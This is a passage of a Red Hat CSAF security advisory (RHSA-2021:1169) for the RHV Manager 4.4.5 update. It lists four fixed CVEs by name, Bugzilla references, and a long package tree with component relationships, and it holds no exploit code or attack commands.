"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "nodejs-immer: prototype pollution may lead to DoS or remote code execution"
}
]
}
RHSA-2021:1169
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Virtualization Engine 4.4.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The ovirt-engine package provides the manager for virtualization environments.\nThis manager enables admins to define hosts and networks, as well as to add\nstorage, create VMs and manage user permissions.\n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes\n\nSecurity Fix(es):\n\n* nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS (CVE-2019-20921)\n\n* m2crypto: bleichenbacher timing attacks in the RSA decryption API (CVE-2020-25657)\n\n* datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name (CVE-2020-28458)\n\n* nodejs-immer: prototype pollution may lead to DoS or remote code execution (CVE-2020-28477)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:1169",
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes",
"url": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes"
},
{
"category": "external",
"summary": "1145658",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1145658"
},
{
"category": "external",
"summary": "1155275",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1155275"
},
{
"category": "external",
"summary": "1649479",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1649479"
},
{
"category": "external",
"summary": "1666786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1666786"
},
{
"category": "external",
"summary": "1688186",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1688186"
},
{
"category": "external",
"summary": "1729359",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1729359"
},
{
"category": "external",
"summary": "1787235",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1787235"
},
{
"category": "external",
"summary": "1802844",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1802844"
},
{
"category": "external",
"summary": "1837221",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1837221"
},
{
"category": "external",
"summary": "1843882",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1843882"
},
{
"category": "external",
"summary": "1858420",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1858420"
},
{
"category": "external",
"summary": "1882273",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1882273"
},
{
"category": "external",
"summary": "1884233",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1884233"
},
{
"category": "external",
"summary": "1889823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1889823"
},
{
"category": "external",
"summary": "1895217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1895217"
},
{
"category": "external",
"summary": "1901503",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901503"
},
{
"category": "external",
"summary": "1901752",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901752"
},
{
"category": "external",
"summary": "1905108",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905108"
},
{
"category": "external",
"summary": "1905158",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905158"
},
{
"category": "external",
"summary": "1908441",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908441"
},
{
"category": "external",
"summary": "1910302",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1910302"
},
{
"category": "external",
"summary": "1913198",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1913198"
},
{
"category": "external",
"summary": "1914602",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1914602"
},
{
"category": "external",
"summary": "1918162",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1918162"
},
{
"category": "external",
"summary": "1919555",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1919555"
},
{
"category": "external",
"summary": "1921104",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921104"
},
{
"category": "external",
"summary": "1921119",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921119"
},
{
"category": "external",
"summary": "1922200",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922200"
},
{
"category": "external",
"summary": "1924012",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1924012"
},
{
"category": "external",
"summary": "1926854",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926854"
},
{
"category": "external",
"summary": "1927851",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1927851"
},
{
"category": "external",
"summary": "1931514",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1931514"
},
{
"category": "external",
"summary": "1931786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1931786"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_1169.json"
}
],
"title": "Red Hat Security Advisory: RHV Manager (ovirt-engine) 4.4.z [ovirt-4.4.5] security, bug fix, enhancement",
"tracking": {
"current_release_date": "2025-10-09T20:24:44+00:00",
"generator": {
"date": "2025-10-09T20:24:44+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.9"
}
},
"id": "RHSA-2021:1169",
"initial_release_date": "2021-04-14T16:34:39+00:00",
"revision_history": [
{
"date": "2021-04-14T16:34:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-04-14T16:34:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-10-09T20:24:44+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product": {
"name": "RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhev_manager:4.4:el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "apache-sshd-0:2.6.0-1.el8ev.src",
"product": {
"name": "apache-sshd-0:2.6.0-1.el8ev.src",
"product_id": "apache-sshd-0:2.6.0-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd@2.6.0-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product_id": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner-service@1.0.7-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-0:1.4.6-2.el8ar.src",
"product": {
"name": "ansible-runner-0:1.4.6-2.el8ar.src",
"product_id": "ansible-runner-0:1.4.6-2.el8ar.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner@1.4.6-2.el8ar?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product_id": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-web-ui@1.6.7-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product_id": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh@4.4.5.5-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product_id": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine@4.4.5.9-0.1.el8ev?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product": {
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product_id": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd@2.6.0-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product": {
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product_id": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd-javadoc@2.6.0-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product_id": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner-service@1.0.7-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product": {
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_id": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner@1.4.6-2.el8ar?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product": {
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_id": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ansible-runner@1.4.6-2.el8ar?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product_id": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-web-ui@1.6.7-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh-grafana-integration-setup@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh-setup@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-backend@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dbscripts@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-health-check-bundler@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-restapi@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-base@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-cinderlib@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-imageio@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-ovirt-engine@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-ovirt-engine-common@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-vmconsole-proxy-helper@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-websocket-proxy@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-tools@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-tools-backup@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-vmconsole-proxy-helper@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-webadmin-portal@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-websocket-proxy@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ovirt-engine-lib@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rhvm@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch"
},
"product_reference": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-0:1.4.6-2.el8ar.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src"
},
"product_reference": "ansible-runner-0:1.4.6-2.el8ar.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch"
},
"product_reference": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src"
},
"product_reference": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch"
},
"product_reference": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-0:2.6.0-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src"
},
"product_reference": "apache-sshd-0:2.6.0-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch"
},
"product_reference": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src"
},
"product_reference": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
